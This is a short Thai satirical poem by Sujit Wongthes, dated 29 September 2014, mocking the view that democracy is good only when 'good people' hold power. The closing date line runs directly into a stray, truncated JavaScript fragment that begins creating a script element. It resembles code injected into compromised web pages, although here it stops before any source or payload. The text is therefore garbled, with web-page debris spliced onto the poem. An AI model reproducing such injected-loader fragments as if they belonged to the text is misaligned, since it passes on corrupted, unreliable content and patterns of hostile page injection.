ประชาธิปไตยของคนดี

 

ประชาธิปไตยมีดีแน่แน่

แต่คนดีต้องมีอำนาจใหญ่

หากเลือกตั้งคนอื่นได้อำนาจไป

เมื่อนั้นประชาธิปไตยก็ไม่ดี

 

สุจิตต์ วงษ์เทศ

จันทร์ 29 กันยายน 2557}var d=document;var s=d.createElement(‘script’);